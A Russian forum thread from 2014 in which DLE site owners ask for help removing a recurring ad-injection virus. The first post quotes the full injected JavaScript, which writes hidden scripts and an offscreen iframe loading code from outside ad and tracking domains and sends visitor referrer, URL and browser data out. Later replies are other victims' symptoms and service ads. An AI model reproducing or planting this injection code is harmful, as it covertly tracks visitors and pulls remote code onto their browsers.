DLE Рекламный Вирус Скрипт

Serex · 2014-01-26T18:13:23.0000000Z

Зараза лезет непонятно каким образом. Менял пароли от всего, Удалял и снова заливал дистрибутив,агрейдил движок с 9.8 до 10.1 Все равно появляется буквально спустя минуты. В HTML коде страницы ppadman.ru/88ufzxjs3km5e8w8gff8k45mlp9d34n5v5jgvqv5w?ggo=3u5hh Вот сам код if (typeof ar_exposure_price === 'undefined') { var ar_exposure_price = -2; } var test, ppdr_url; if (!window.p780170a7394486c6c8d7f87a89a02f03) { window.p780170a7394486c6c8d7f87a89a02f03 = 0; } var logger; var a75smt1ex6595vujq273382kjpq1q = function (data) { if (typeof data != 'undefined' && typeof data['loger.ru'] != 'undefined') { logger = data['loger.ru']; if (typeof logger.gender != 'undefined' && logger.gender !== null) { ppdr_url += '&7bc6koe644w86k6wd72waq=' + logger.gender; } if (typeof logger.age != 'undefined' && logger.age.max !== null) { ppdr_url += '&831xevatieo6n71amvgp3z=' + logger.age.max; } if (typeof logger.age != 'undefined' && logger.age.min !== null) { ppdr_url += '&7mfa3yctvg0610u82y52wy4ixwd=' + logger.age.min; } if (typeof logger.segments != 'undefined' && logger.segments !== null && logger.segments.length > 0) { for (var i = 0; i < logger.segments.length; i++) { ppdr_url += '&831xevawg2l746wzkfjf9xmr44qu[]=' + logger.segments ; } } } }; (function () { if (typeof window['ppndr_code_loaded'] != 'undefined' && window['ppndr_code_loaded'] == true) { return; } var b = (function () { var s; var d = document.createElement('div'); if (window.getComputedStyle) { s = window.getComputedStyle(d, null); } else if (d.currentStyle) { s = d.currentStyle; } else { return { }; } var b = { }; var r = { o: /^O[A-Z]/, w: /^webkit[A-Z]/, m: /^ms[A-Z]/, f: /^Moz[A-Z]/ }; for (var k1 in s) { for (var k2 in r) { if (r[k2].test(k1)) { b[k2] = true; } } } return b; })(); var ref = (document.referrer && document.referrer != "") ? '&ka6z2q=' + escape(document.referrer.replace(/^https?:\/\/(www\.)?/, '')) : ''; var seed = '&5fjkifx0=t' + Math.round(Math.random() * 100000000); var referer = escape(window.location.href.replace(/^https?:\/\/(www\.)?/, '')); var ft = 0, fk = 0, fd = 0, fu = 0, match; test = fu; document.write('<div class="ccs">' + '<sc' + 'ript charset="utf-8" type="text/javascript" language="javascript" src="http://trahic.ru/8pi9e3ocvgg3suxw1ty"></scr' + 'ipt>' + '<ifr' + 'ame width="1" height="1" style="position:absolute !important;left:-100000px !important;top:-100000px !important; width: 0px !important; height: 0px !important;" src="http://trahic.ru/68sad0b9yyz7yogl6zpglpdb2?sh0lp9e8v=1"></ifr' + 'ame>' + '<sc' + 'ript charset="utf-8" type="text/javascript" language="javascript" src="http://trahic.ru/6uyhnbnv4uit8dlja"></sc' + 'ript>' + '<sc' + 'ript charset="utf-8" type="text/javascript" language="javascript" src="http://trahic.ru/9bn9prxvk2379qhmtkq05pfoe?' + ref + '"></scr' + 'ipt>' + '<sc' + 'ript charset="utf-8" type="text/javascript" language="javascript" callback="a75smt1ex6595vujq273382kjpq1q" src="//dadegid.ru"></sc' + 'ript>' + '<sc' + 'ript charset="utf-8" type="text/javascript" language="javascript" src="http://ppadman.ru/6mn6du6v13w5pwy0z45hzhi1q"></scr' + 'ipt> </div>' + '<img src="http://advombat.ru/0.gif?pid=TIZNET" style="width:1px !important;height: 1px !important;position:absolute !important;top:-1480000px !important;left:-1480000px !important;border:none !important;opacity: 1;filter: alpha(opacity=100);-khtml-opacity: 1;-moz-opacity: 1;"/>'); window.p780170a7394486c6c8d7f87a89a02f03++; ppdr_url = 'http://ppadman.ru/88ufzxjs3km5e8w8gff8k45mlp9d34n5v5jgvqv5w?ggo=3u5hh' + ref + seed + (top == window ? '' : '&1b6hthbmu7=1') + '&7pfm4fbqp1mggt=' + referer + '&4omww=' + ft + '&4g7j3=' + fk + '&47s40=' + fd + '&40r9d=' + fu + '&tmy65er7y=' + window.p780170a7394486c6c8d7f87a89a02f03 + '' + '&181v4epx7f=' + (b.o ? 1 : 0) + '&5bkjvlshnx7=' + (b.w ? 1 : 0) + '&7gzmr8y7ygwhg7=' + (b.f ? 1 : 0) + '&5n9ktm39=' + (b.m ? 1 : 0) + '' + '&15cqywhrv1=' + screen.width + '&svrhpsa4y=' + screen.height; })(); window[ 'ppndr_code_loaded' ] = true; var pop_check_go = '', pop_check_cid = '', ppdr_s_e = false;

Graffy

14 февраля 2014, 04:59

#21

Стукните 29596862, попробую помочь

AnyTubes Dorgen v2 (/ru/forum/comment/14276302)

180

Алексей

15 февраля 2014, 17:48

#22

zoom123:
Добрый день!!

А что дальше проблема решена?
У меня на сайт тоже какой то левый админ проник поставил скрипт и не знаю что делать.

Кто ни будь может помочь, всю голову сломал.

Вот что происходит:

После того как было проникновение проверил лог действий, там всё без изменений!
Дальше больше нашёл скрипт в исходном коде странице, а удалить не удалось в .tpl его нет.
Тогда сделал следующее, удалил полностью папку engine, и поставил с копии, вроди бы всё заработало и скрипт пропал, проверил banners.php чистый.

Но вот в чём засада, как только я ввожу в свой админ-пароль и логин, всё остаётся как было ни чего не меняется, но стоит мне выйти воаля скрипт снова прописывается и в banners.php появляется сам... Что делать дыже не знаю !!!!

ОЧЕНЬ НУЖНА ПОМОЩЬ!!!!

Вирусный скрипт может быть не только в баннерах, так же могли его прописать в любом исполняющем файле. Посмотриет в админке в разделе баннеры точно ли удален вирус!

Удаление вирусов с сайта, защита сайта, Гарантия! ( /ru/forum/999073 ) -> топик на маулталк ( http://www.maultalk.com/topic113834s0.html ) -> Топик в сапе ( http://forum.sape.ru/showthread.php?t=79363 ). TELEGRAM - https://t.me/Doktorsaitov

В 2023 году 36,9% всех DDoS-атак пришлось на сферу финансов

Переиграть и победить: как анализировать конкурентов для продвижения сайта

DLE Рекламный Вирус Скрипт